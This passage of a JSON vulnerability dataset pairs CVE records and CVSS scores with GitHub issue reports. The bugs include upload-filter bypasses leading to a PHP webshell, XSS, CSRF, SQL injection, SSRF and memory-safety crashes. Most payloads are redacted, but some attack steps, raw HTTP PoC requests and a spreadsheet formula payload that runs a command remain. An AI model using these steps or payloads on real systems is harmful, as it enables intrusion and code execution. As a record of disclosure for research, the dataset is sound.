  23318. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  23319. "severity": "MEDIUM",
  23320. "baseScore": 5.4,
  23321. "impactScore": 2.7,
  23322. "exploitabilityScore": 2.3
  23323. },
  23324. {
  23325. "CVE_ID": "CVE-2018-14911",
  23326. "Issue_Url_old": "https://github.com/yxcmf/ukcms/issues/1",
  23327. "Issue_Url_new": "https://github.com/yxcmf/ukcms/issues/1",
  23328. "Repo_new": "yxcmf/ukcms",
  23329. "Issue_Created_At": "2018-08-01T01:39:58Z",
  23330. "description": "ukcms NUMBERTAG and other Lower version ) has a APITAG vulnerability. Vulnerability description The CMS background content management editor has a file uploading vulnerability. By modifying the background file upload parameter: the APITAG upload file suffix\" section, you can bypass the restrictions on php file upload by cms, and then pass the Trojan horse and the getshell poc APITAG to the backstage as the admin NUMBERTAG add the value 'php' into 'upload_file_ext' which is a cms parameter use to limit upload APITAG use two 'php' to bypass limit eg: php,php) url: PATHTAG FILETAG FILETAG NUMBERTAG Go to any page editing section,choose the upload function. APITAG the suffix of a PHP Trojan to APITAG For pass the limit) Second,click the button to save the upload file APITAG BURPSUITE for packet capture and modification,modify the suffix to .php,add some arbitrarily string before the file APITAG pass the file head check),and then upload it! FILETAG FILETAG FILETAG FILETAG APITAG last step,connection the trojan FILETAG FILETAG Success!",
  23331. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  23332. "severity": "HIGH",
  23333. "baseScore": 7.2,
  23334. "impactScore": 5.9,
  23335. "exploitabilityScore": 1.2
  23336. },
  23337. {
  23338. "CVE_ID": "CVE-2018-14938",
  23339. "Issue_Url_old": "https://github.com/simsong/tcpflow/issues/182",
  23340. "Issue_Url_new": "https://github.com/simsong/tcpflow/issues/182",
  23341. "Repo_new": "simsong/tcpflow",
  23342. "Issue_Created_At": "2018-08-02T15:47:43Z",
  23343. "description": "A integer overflow vulnerability in APITAG There is a overflow vulnerability in function APITAG while handle wifipacp's caplen. APITAG if the caplen NUMBERTAG we can cause a integer overflow vulnerability in function APITAG , which will result in a out of bounds read and may allow access to sensitive memory(or just a ddos). ERRORTAG",
  23344. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  23345. "severity": "CRITICAL",
  23346. "baseScore": 9.1,
  23347. "impactScore": 5.2,
  23348. "exploitabilityScore": 3.9
  23349. },
  23350. {
  23351. "CVE_ID": "CVE-2018-14940",
  23352. "Issue_Url_old": "https://github.com/m0us3Sun/PHPCMS-v9/issues/1",
  23353. "Issue_Url_new": "https://github.com/m0us3sun/phpcms-v9/issues/1",
  23354. "Repo_new": "m0us3sun/phpcms-v9",
  23355. "Issue_Created_At": "2018-07-23T04:07:15Z",
  23356. "description": "PHPCMS NUMBERTAG PHPCMS APITAG \u6f0f\u6d1e\u5730\u5740\uff1a URLTAG \u627e\u5230\u5b58\u5728\u9a8c\u8bc1\u7801\u5904\uff0c\u5ba1\u67e5\u5143\u7d20\u627e\u5230\u9a8c\u8bc1\u7801\u94fe\u63a5\uff1a FILETAG \u7136\u540e\u6293\u5305\uff0c\u89c2\u5bdf\u9a8c\u8bc1\u7801\u957f\u3001\u5bbd\u53ef\u63a7\uff1a URLTAG FILETAG FILETAG \u4e0d\u65ad\u52a0\u5927\u957f\u5bbd\uff0c\u591a\u6b21\u53d1\u5305\uff0c\u53ef\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002 FILETAG FILETAG FILETAG APITAG \u4fee\u590d\uff1a \u5efa\u8bae\u914d\u7f6e\u56fe\u50cf\u9ed8\u8ba4\u53c2\u6570\uff0c\u662f\u53c2\u6570\u4e0d\u53ef\u63a7\u3002",
  23357. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  23358. "severity": "HIGH",
  23359. "baseScore": 7.5,
  23360. "impactScore": 3.6,
  23361. "exploitabilityScore": 3.9
  23362. },
  23363. {
  23364. "CVE_ID": "CVE-2018-14944",
  23365. "Issue_Url_old": "https://github.com/thejinchao/jpeg_encoder/issues/4",
  23366. "Issue_Url_new": "https://github.com/thejinchao/jpeg_encoder/issues/4",
  23367. "Repo_new": "thejinchao/jpeg_encoder",
  23368. "Issue_Created_At": "2018-07-23T02:20:36Z",
  23369. "description": "SEGV in function APITAG I used Clang NUMBERTAG and APITAG to build jpeg encoder , this file URLTAG can cause SEGV in function APITAG when executing this command: APITAG This is the ASAN information: ERRORTAG",
  23370. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23371. "severity": "HIGH",
  23372. "baseScore": 7.8,
  23373. "impactScore": 5.9,
  23374. "exploitabilityScore": 1.8
  23375. },
  23376. {
  23377. "CVE_ID": "CVE-2018-14945",
  23378. "Issue_Url_old": "https://github.com/thejinchao/jpeg_encoder/issues/6",
  23379. "Issue_Url_new": "https://github.com/thejinchao/jpeg_encoder/issues/6",
  23380. "Repo_new": "thejinchao/jpeg_encoder",
  23381. "Issue_Created_At": "2018-07-23T02:21:38Z",
  23382. "description": "heap buffer overflow in function APITAG I used Clang NUMBERTAG and APITAG to build jpeg encoder , this file URLTAG can cause heap buffer overflow in function APITAG when executing this command: APITAG This is the ASAN information: ERRORTAG",
  23383. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23384. "severity": "HIGH",
  23385. "baseScore": 7.8,
  23386. "impactScore": 5.9,
  23387. "exploitabilityScore": 1.8
  23388. },
  23389. {
  23390. "CVE_ID": "CVE-2018-14946",
  23391. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/19",
  23392. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/19",
  23393. "Repo_new": "flexpaper/pdf2json",
  23394. "Issue_Created_At": "2018-07-23T11:08:54Z",
  23395. "description": "Alloc_dealloc_mismatch in function APITAG I use Clang NUMBERTAG and APITAG to build pdf2json NUMBERTAG this FILETAG can cause alloc dealloc mismatch with the following command: APITAG This is the ASAN information: ERRORTAG",
  23396. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23397. "severity": "HIGH",
  23398. "baseScore": 8.8,
  23399. "impactScore": 5.9,
  23400. "exploitabilityScore": 2.8
  23401. },
  23402. {
  23403. "CVE_ID": "CVE-2018-14947",
  23404. "Issue_Url_old": "https://github.com/flexpaper/pdf2json/issues/20",
  23405. "Issue_Url_new": "https://github.com/flexpaper/pdf2json/issues/20",
  23406. "Repo_new": "flexpaper/pdf2json",
  23407. "Issue_Created_At": "2018-07-23T11:09:27Z",
  23408. "description": "Alloc_dealloc_mismatch in function APITAG I use Clang NUMBERTAG and APITAG to build pdf2json NUMBERTAG this FILETAG can cause alloc dealloc mismatch with the following command: APITAG This is the ASAN information: ERRORTAG",
  23409. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23410. "severity": "HIGH",
  23411. "baseScore": 8.8,
  23412. "impactScore": 5.9,
  23413. "exploitabilityScore": 2.8
  23414. },
  23415. {
  23416. "CVE_ID": "CVE-2018-14948",
  23417. "Issue_Url_old": "https://github.com/dilawar/sound/issues/4",
  23418. "Issue_Url_new": "https://github.com/dilawar/sound/issues/4",
  23419. "Repo_new": "dilawar/sound",
  23420. "Issue_Created_At": "2018-07-24T10:35:37Z",
  23421. "description": "Alloc dealloc mismatch in function APITAG I used gcc NUMBERTAG and APITAG to build sound URLTAG , this file URLTAG can cause alloc dealloc mismatch when executing this command: APITAG This is the ASAN information: ERRORTAG",
  23422. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23423. "severity": "HIGH",
  23424. "baseScore": 7.8,
  23425. "impactScore": 5.9,
  23426. "exploitabilityScore": 1.8
  23427. },
  23428. {
  23429. "CVE_ID": "CVE-2018-14958",
  23430. "Issue_Url_old": "https://github.com/alterebro/WeaselCMS/issues/6",
  23431. "Issue_Url_new": "https://github.com/alterebro/weaselcms/issues/6",
  23432. "Repo_new": "alterebro/weaselcms",
  23433. "Issue_Created_At": "2018-08-03T13:29:07Z",
  23434. "description": "There are two CSRF vulnerabilities that can create new pages or update the website settings NUMBERTAG There is a CSRF vulnerabilitie that can create new pages via FILETAG ?b=pages&a=new poc: APITAG create a new page CODETAG APITAG is a CSRF vulnerabilitie that can update the website settings via index.php poc: APITAG update the website settings CODETAG",
  23435. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23436. "severity": "HIGH",
  23437. "baseScore": 8.8,
  23438. "impactScore": 5.9,
  23439. "exploitabilityScore": 2.8
  23440. },
  23441. {
  23442. "CVE_ID": "CVE-2018-15129",
  23443. "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/16",
  23444. "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/16",
  23445. "Repo_new": "thinksaas/thinksaas",
  23446. "Issue_Created_At": "2018-08-07T05:29:05Z",
  23447. "description": "\u5b58\u50a8\u578bxss\uff08\u9700\u8981\u6ce8\u518c\u767b\u5f55\uff09/ Storage type APITAG to register and log in\uff09. Storage type APITAG to register and log in\uff09 When the article is published: POST APITAG HTTP NUMBERTAG Host: APITAG Connection: close Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG User Agent: Content Type: application/x www form urlencoded Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG Add an attack poc\uff1a APITAG APITAG to the NUMBERTAG Fp NUMBERTAG E after the content parameter Official return\uff1a URLTAG PATHTAG \u5b58\u50a8\u578bxss\uff08\u9700\u8981\u6ce8\u518c\u767b\u5f55\uff09 \u53d1\u8868\u6587\u7ae0\u65f6\uff1a POST APITAG HTTP NUMBERTAG Host: APITAG Connection: close Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG User Agent: Content Type: application/x www form urlencoded Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG \u5728content NUMBERTAG Fp NUMBERTAG E\u6dfb\u52a0\u653b\u51fbpoc: APITAG APITAG \u5b98\u65b9\u590d\u73b0\uff1a URLTAG",
  23448. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  23449. "severity": "MEDIUM",
  23450. "baseScore": 5.4,
  23451. "impactScore": 2.7,
  23452. "exploitabilityScore": 2.3
  23453. },
  23454. {
  23455. "CVE_ID": "CVE-2018-15130",
  23456. "Issue_Url_old": "https://github.com/thinksaas/ThinkSAAS/issues/18",
  23457. "Issue_Url_new": "https://github.com/thinksaas/thinksaas/issues/18",
  23458. "Repo_new": "thinksaas/thinksaas",
  23459. "Issue_Created_At": "2018-08-07T08:00:18Z",
  23460. "description": "\u5b58\u50a8\u578bxss2\uff08\u9700\u8981\u6ce8\u518c\u767b\u5f55\uff09/ Storage type APITAG to register and log in\uff09. \u5f53\u6dfb\u52a0\u5c0f\u7ec4\u65f6\uff1a URLTAG When the group is added: URLTAG \u4fee\u6539\u5c0f\u7ec4\u4ecb\u7ecd\u65f6\uff1a When the revision of the panel: POST APITAG HTTP NUMBERTAG Host: APITAG Connection: close Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG SE NUMBERTAG APITAG NUMBERTAG Content Type: multipart/form data; boundary= APITAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG Content Disposition: form data; name=\"groupname\" name1 APITAG Content Disposition: form data; name=\"groupdesc\" describe1 APITAG APITAG Content Disposition: form data; name=\"photo\"; filename=\"\" Content Type: application/octet stream APITAG Content Disposition: form data; name=\"tag\" Label1 APITAG Content Disposition: form data; name=\"token\" APITAG APITAG \u5728groupdesc\u53c2\u6570\u7aef\u672a\u8fc7\u6ee4\u6076\u610f\u4ee3\u7801\uff0c\u9020\u6210\u6ce8\u5165\u3002 The malicious code is not filtered at the groupdesc parameter end, causing injection. POC\uff1a APITAG \u5b98\u65b9\u4e3e\u4f8b\uff1a URLTAG Official examples: URLTAG",
  23461. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  23462. "severity": "MEDIUM",
  23463. "baseScore": 5.4,
  23464. "impactScore": 2.7,
  23465. "exploitabilityScore": 2.3
  23466. },
  23467. {
  23468. "CVE_ID": "CVE-2018-15137",
  23469. "Issue_Url_old": "https://github.com/safakaslan/CelaLinkCLRM20/issues/1",
  23470. "Issue_Url_new": "https://github.com/safakaslan/celalinkclrm20/issues/1",
  23471. "Repo_new": "safakaslan/CelaLinkCLRM20",
  23472. "Issue_Created_At": "2018-08-01T14:25:17Z",
  23473. "description": "Arbitrary File Upload Cela Link CLR M NUMBERTAG Exploit Title: Arbitrary File Upload Cela Link CLR M NUMBERTAG Date NUMBERTAG Shodan Dork: CLR M NUMBERTAG Exploit Author: Safak Aslan Software Link: FILETAG Version NUMBERTAG Authentication Required: No Tested on: Windows Vulnerability Description Due to the Via APITAG APITAG Distributed Authoring and Versioning), on the remote server, Cela Link CLR M NUMBERTAG allows unauthorized users to upload any file (e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes remote code execution as well. Due to the APITAG it is possible to upload the arbitrary file utilizing the PUT method. Proof of Concept Request PUT FILETAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en,tr TR; APITAG US;q NUMBERTAG Accept Encoding: gzip, deflate Content Length NUMBERTAG the reflection of random numbers NUMBERTAG Response HTTP NUMBERTAG Created Content Length NUMBERTAG Date: Fri NUMBERTAG Jul NUMBERTAG GMT Server: APITAG As a result, on the FILETAG , \"the reflection of random numbers NUMBERTAG is reflected on the page.",
  23474. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23475. "severity": "CRITICAL",
  23476. "baseScore": 9.8,
  23477. "impactScore": 5.9,
  23478. "exploitabilityScore": 3.9
  23479. },
  23480. {
  23481. "CVE_ID": "CVE-2018-15157",
  23482. "Issue_Url_old": "https://github.com/libyal/libfsclfs/issues/3",
  23483. "Issue_Url_new": "https://github.com/libyal/libfsclfs/issues/3",
  23484. "Repo_new": "libyal/libfsclfs",
  23485. "Issue_Created_At": "2018-08-08T06:44:43Z",
  23486. "description": "APITAG OOB read Access Violation. the libfsclfs_block_read function in APITAG in libfsclfs allow remote attackers to cause a denial of service(invalid memory read and application crash) via a crafted clfs file. ERRORTAG FILETAG",
  23487. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  23488. "severity": "MEDIUM",
  23489. "baseScore": 6.5,
  23490. "impactScore": 3.6,
  23491. "exploitabilityScore": 2.8
  23492. },
  23493. {
  23494. "CVE_ID": "CVE-2018-15158",
  23495. "Issue_Url_old": "https://github.com/libyal/libesedb/issues/43",
  23496. "Issue_Url_new": "https://github.com/libyal/libesedb/issues/43",
  23497. "Repo_new": "libyal/libesedb",
  23498. "Issue_Created_At": "2018-08-08T06:56:15Z",
  23499. "description": "Multiple bugs NUMBERTAG the libesedb_page_read_values function in libesedb_page.c in libesedb allow remote attackers to cause a denial of service(invalid memory read and application crash) via a crafted esedb file. ERRORTAG NUMBERTAG the libesedb_page_read_tags function in libesedb_page.c in libesedb allow remote attackers to cause a denial of service(invalid memory read and application crash) via a crafted esedb file. ERRORTAG NUMBERTAG the APITAG function in libesedb_catalog_definition.c in libesedb allow remote attackers to cause a denial of service(invalid memory read and application crash) via a crafted esedb file. ERRORTAG NUMBERTAG the libesedb_key_append_data function in libesedb_key.c in libesedb allow remote attackers to cause a denial of service(invalid memory read and application crash) via a crafted esedb file. ERRORTAG FILETAG",
  23500. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  23501. "severity": "MEDIUM",
  23502. "baseScore": 6.5,
  23503. "impactScore": 3.6,
  23504. "exploitabilityScore": 2.8
  23505. },
  23506. {
  23507. "CVE_ID": "CVE-2018-15168",
  23508. "Issue_Url_old": "https://github.com/x-f1v3/ForCve/issues/2",
  23509. "Issue_Url_new": "https://github.com/x-f1v3/forcve/issues/2",
  23510. "Repo_new": "x-f1v3/forcve",
  23511. "Issue_Created_At": "2018-07-30T11:24:32Z",
  23512. "description": "Zoho manageengine Applications Manager SQL Injection vulnerability. Zoho manageengine Applications Manager SQL Injection vulnerability Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: jacky xing From APITAG Exploit Author's Email: jacky. EMAILTAG .cn I found a sql injection in the Zoho APITAG Applications Manager NUMBERTAG build) via the resids parameter in APITAG GET request. Proof of Concept: CODETAG This is a time based blind SQL Injection vulnerability .So I use sqlmap to exploit it APITAG following is a proof screenshot. FILETAG To get the admin'spassword: FILETAG The vendor has fixed the vulnerability\uff1a FILETAG",
  23513. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  23514. "severity": "CRITICAL",
  23515. "baseScore": 9.8,
  23516. "impactScore": 5.9,
  23517. "exploitabilityScore": 3.9
  23518. },
  23519. {
  23520. "CVE_ID": "CVE-2018-15169",
  23521. "Issue_Url_old": "https://github.com/x-f1v3/ForCve/issues/3",
  23522. "Issue_Url_new": "https://github.com/x-f1v3/forcve/issues/3",
  23523. "Repo_new": "x-f1v3/forcve",
  23524. "Issue_Created_At": "2018-07-31T11:28:15Z",
  23525. "description": "Zoho manageengine Applications Manager NUMBERTAG build) Reflected XSS. Zoho manageengine Applications Manager NUMBERTAG build) Reflected XSS Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: jacky xing From APITAG Exploit Author's Email: jacky. EMAILTAG .cn I found a Reflected XSS in the Zoho APITAG Applications Manager NUMBERTAG build) via the method parameter in APITAG request. Proof of Concept APITAG Local test: FILETAG Demo site test: FILETAG Notice: This vul can reproduce without login. The vendor has fixed the vulnerability\uff1a FILETAG",
  23526. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  23527. "severity": "MEDIUM",
  23528. "baseScore": 6.1,
  23529. "impactScore": 2.7,
  23530. "exploitabilityScore": 2.8
  23531. },
  23532. {
  23533. "CVE_ID": "CVE-2018-15192",
  23534. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5366",
  23535. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5366",
  23536. "Repo_new": "gogs/gogs",
  23537. "Issue_Created_At": "2018-08-06T10:24:52Z",
  23538. "description": "server side request forgery (SSRF) vulnerability in webhooks. Gogs version (or commit ref NUMBERTAG Can you reproduce the bug at FILETAG FILETAG you could see that i get the http response of caddy running in APITAG of APITAG , which is only opened to local user also , i could know which port is opened like mysql in port NUMBERTAG even it just opened to a local user Patch check the url that users may input , webhooks shouldn't allow such internal address access Discoverer Wenxu Wu of Tencent's Xuanwu Lab",
  23539. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  23540. "severity": "HIGH",
  23541. "baseScore": 8.6,
  23542. "impactScore": 4.0,
  23543. "exploitabilityScore": 3.9
  23544. },
  23545. {
  23546. "CVE_ID": "CVE-2018-15192",
  23547. "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/4624",
  23548. "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/4624",
  23549. "Repo_new": "go-gitea/gitea",
  23550. "Issue_Created_At": "2018-08-06T13:17:25Z",
  23551. "description": "server side request forgery (SSRF) vulnerability in webhooks. Gitea version (or commit ref NUMBERTAG rc NUMBERTAG g9ea NUMBERTAG f1f Git version: not relevant Operating system: not relevant Database (use APITAG ): [ ] APITAG [x] APITAG [ ] MSSQL [ ] APITAG Can you reproduce the bug at FILETAG [x] Yes (provide example URL) [ ] No [ ] Not relevant Log gist: Description Due to shared code base, gitea is affected by issue URLTAG (server side request forgery (SSRF) vulnerability in webhooks). To reproduce: create Webhook with target URL to any running existing service exposed only to localhost (for example localhost NUMBERTAG or localhost NUMBERTAG depending on what is running on the test machine). POST content Screenshots See URLTAG",
  23552. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  23553. "severity": "HIGH",
  23554. "baseScore": 8.6,
  23555. "impactScore": 4.0,
  23556. "exploitabilityScore": 3.9
  23557. },
  23558. {
  23559. "CVE_ID": "CVE-2018-15193",
  23560. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5367",
  23561. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5367",
  23562. "Repo_new": "gogs/gogs",
  23563. "Issue_Created_At": "2018-08-06T12:50:42Z",
  23564. "description": "Cross Site Request Forgery (CSRF) in admin panel. Gogs version (or commit ref NUMBERTAG Can you reproduce the bug at FILETAG FILETAG attacker can embed an image tag in issues , when administrator visit the issue , the operation is fired. see the online demo (attention , if administrator visit it , your ssh key is wipped out) URLTAG Patch change the call method of these operations from GET to POST or enable csrf token for get method. Discoverer Wenxu Wu of Tencent's Xuanwu Lab",
  23565. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23566. "severity": "HIGH",
  23567. "baseScore": 8.8,
  23568. "impactScore": 5.9,
  23569. "exploitabilityScore": 2.8
  23570. },
  23571. {
  23572. "CVE_ID": "CVE-2018-15197",
  23573. "Issue_Url_old": "https://github.com/liu21st/onethink/issues/36",
  23574. "Issue_Url_new": "https://github.com/liu21st/onethink/issues/36",
  23575. "Repo_new": "liu21st/onethink",
  23576. "Issue_Created_At": "2018-08-06T13:43:30Z",
  23577. "description": "There are two CSRF vulnerabilities that can add the administrator account. After the Administrator logged in,open the following two page poc: APITAG add a user CODETAG APITAG Endowing user administrator privileges CODETAG",
  23578. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  23579. "severity": "HIGH",
  23580. "baseScore": 8.8,
  23581. "impactScore": 5.9,
  23582. "exploitabilityScore": 2.8
  23583. },
  23584. {
  23585. "CVE_ID": "CVE-2018-15199",
  23586. "Issue_Url_old": "https://github.com/auracms/AuraCMS/issues/1",
  23587. "Issue_Url_new": "https://github.com/auracms/auracms/issues/1",
  23588. "Repo_new": "auracms/auracms",
  23589. "Issue_Created_At": "2018-08-06T12:11:02Z",
  23590. "description": "Stored XSS in bukutamu page. Description: A cross site scripting (XSS) vulnerability in APITAG may allow remote attackers (users) to inject arbitrary Web scripts through the source editor, which will cause an attacker (user) to get the administrator's cookie and log in to the administrator interface. Vulnerability Type: Stored XSS Attack Vectors: APITAG APITAG as a user FILETAG APITAG on Bukutamu > APITAG FILETAG APITAG XSS Payload : APITAG APITAG FILETAG NUMBERTAG Go to Bukutamu NUMBERTAG SS! FILETAG Attack Impact: This can be used to perform operations on an administrator (or any user leaving a message on the site) and can lead to hijacking an administrator's cookie.",
  23591. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  23592. "severity": "MEDIUM",
  23593. "baseScore": 5.4,
  23594. "impactScore": 2.7,
  23595. "exploitabilityScore": 2.3
  23596. },
  23597. {
  23598. "CVE_ID": "CVE-2018-15202",
  23599. "Issue_Url_old": "https://github.com/Juunan06/eCommerce/issues/1",
  23600. "Issue_Url_new": "https://github.com/juunan06/ecommerce/issues/1",
  23601. "Repo_new": "juunan06/ecommerce",
  23602. "Issue_Created_At": "2018-08-06T07:46:27Z",
  23603. "description": "There is a CSRF vulnerability that can add new users, and add site projects to fake identity. There is a CSRF vulnerability that can add new users, and add site projects to fake identity APITAG user POC\uff1a CODETAG APITAG item POC\uff1a ERRORTAG",
  23604. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
  23605. "severity": "MEDIUM",
  23606. "baseScore": 6.3,
  23607. "impactScore": 3.4,
  23608. "exploitabilityScore": 2.8
  23609. },
  23610. {
  23611. "CVE_ID": "CVE-2018-15203",
  23612. "Issue_Url_old": "https://github.com/ignitedcms/ignitedcms/issues/4",
  23613. "Issue_Url_new": "https://github.com/ignitedcms/ignitedcms/issues/4",
  23614. "Repo_new": "ignitedcms/ignitedcms",
  23615. "Issue_Created_At": "2018-08-06T13:09:04Z",
  23616. "description": "There are two CSRF vulnerabilities that can create new pages or update the website settings. APITAG is a CSRF vulnerability that can create new pages poc: CODETAG",
  23617. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  23618. "severity": "MEDIUM",
  23619. "baseScore": 6.5,
  23620. "impactScore": 3.6,
  23621. "exploitabilityScore": 2.8
  23622. },
  23623. {
  23624. "CVE_ID": "CVE-2018-15474",
  23625. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/2450",
  23626. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/2450",
  23627. "Repo_new": "dokuwiki/dokuwiki",
  23628. "Issue_Created_At": "2018-07-19T18:07:14Z",
  23629. "description": "CSV Formula Injection vulnerability. The following was reported directly to me by Jean Benjamin Rousseau from SEC Consult APITAG AG Vulnerability overview/description: The administration panel of the application has a \"CSV export of users\" feature which allows the export of user data (username, real name, email address and user groups) as a CSV file. On the registration page, it is possible for an attacker to set certain values in the Real Name field that when exported and opened with a spreadsheet application APITAG Excel, Open Office, etc.) will be interpreted as a formula. This puts the administrators who open those malicious exported files at risk. Exfiltration of sensitive data or even the execution of arbitrary code on the local machine of the victim will be the result. The final impact depends on the used spreadsheet software on the client of the victim. Proof of concept: Registration URL: URLTAG When the registration request is submitted, the following parameters are sent in a POST request: APITAG ` The \"fullname\" parameter is not sanitized before being stored and during the CSV export. An attacker can inject different CSV formula payloads in the fullname parameter. For example: =cmd|'/C calc'!A0 As soon as the file gets opened in Microsoft Excel, the program FILETAG is launched. Different warnings might pop up. However, these warnings are usually ignored because the file comes from a trusted source.",
  23630. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
  23631. "severity": "CRITICAL",
  23632. "baseScore": 9.6,
  23633. "impactScore": 6.0,
  23634. "exploitabilityScore": 2.8
  23635. },
  23636. {
  23637. "CVE_ID": "CVE-2018-15503",
  23638. "Issue_Url_old": "https://github.com/swoole/swoole-src/issues/1882",
  23639. "Issue_Url_new": "https://github.com/swoole/swoole-src/issues/1882",
  23640. "Repo_new": "swoole/swoole-src",
  23641. "Issue_Created_At": "2018-08-14T05:30:41Z",
  23642. "description": "SIGSEGV in Swoole APITAG function. Description: Swoole unpack function produces a sigsegv when it calls i_zval_ptr_dtor: Tested on: PHP NUMBERTAG cli) (built: Aug NUMBERTAG NTS ) Swoole: swoole NUMBERTAG Backtrace NUMBERTAG bc NUMBERTAG in i_zval_ptr_dtor (zval_ptr NUMBERTAG ffff NUMBERTAG b NUMBERTAG at PATHTAG NUMBERTAG zend_array_destroy (ht NUMBERTAG ffff NUMBERTAG f3f0) at PATHTAG NUMBERTAG b NUMBERTAG a7 in _zval_dtor_func (p NUMBERTAG ffff NUMBERTAG f3f0) at PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG in _zval_ptr_dtor_nogc (zval_ptr NUMBERTAG fffffff NUMBERTAG at PATHTAG NUMBERTAG swoole_unserialize_object (buffer NUMBERTAG return_value NUMBERTAG ffff NUMBERTAG c0, bucket_len NUMBERTAG args NUMBERTAG flag NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG aeecd in swoole_unserialize_arr (buffer NUMBERTAG ffff NUMBERTAG f NUMBERTAG b, zvalue NUMBERTAG ffff NUMBERTAG c NUMBERTAG APITAG flag NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG b6e NUMBERTAG in php_swoole_unserialize (buffer NUMBERTAG ffff NUMBERTAG f NUMBERTAG a, len NUMBERTAG return_value NUMBERTAG ffff NUMBERTAG c NUMBERTAG object_args NUMBERTAG flag NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG f7 in zim_swoole_serialize_unpack (execute_data NUMBERTAG ffff NUMBERTAG c NUMBERTAG return_value NUMBERTAG ffff NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG d NUMBERTAG b3 in APITAG () at PATHTAG NUMBERTAG execute_ex (e NUMBERTAG ffff NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG d4c NUMBERTAG in zend_execute (op_array NUMBERTAG ffff NUMBERTAG c2a0, return_value NUMBERTAG at PATHTAG NUMBERTAG b9cdfb in zend_execute_scripts (type NUMBERTAG retval NUMBERTAG file_count NUMBERTAG at PATHTAG NUMBERTAG aeba NUMBERTAG in php_execute_script (primary_file NUMBERTAG fffffffe0c0) at PATHTAG NUMBERTAG d4f NUMBERTAG d in do_cli (argc NUMBERTAG arg NUMBERTAG f NUMBERTAG at 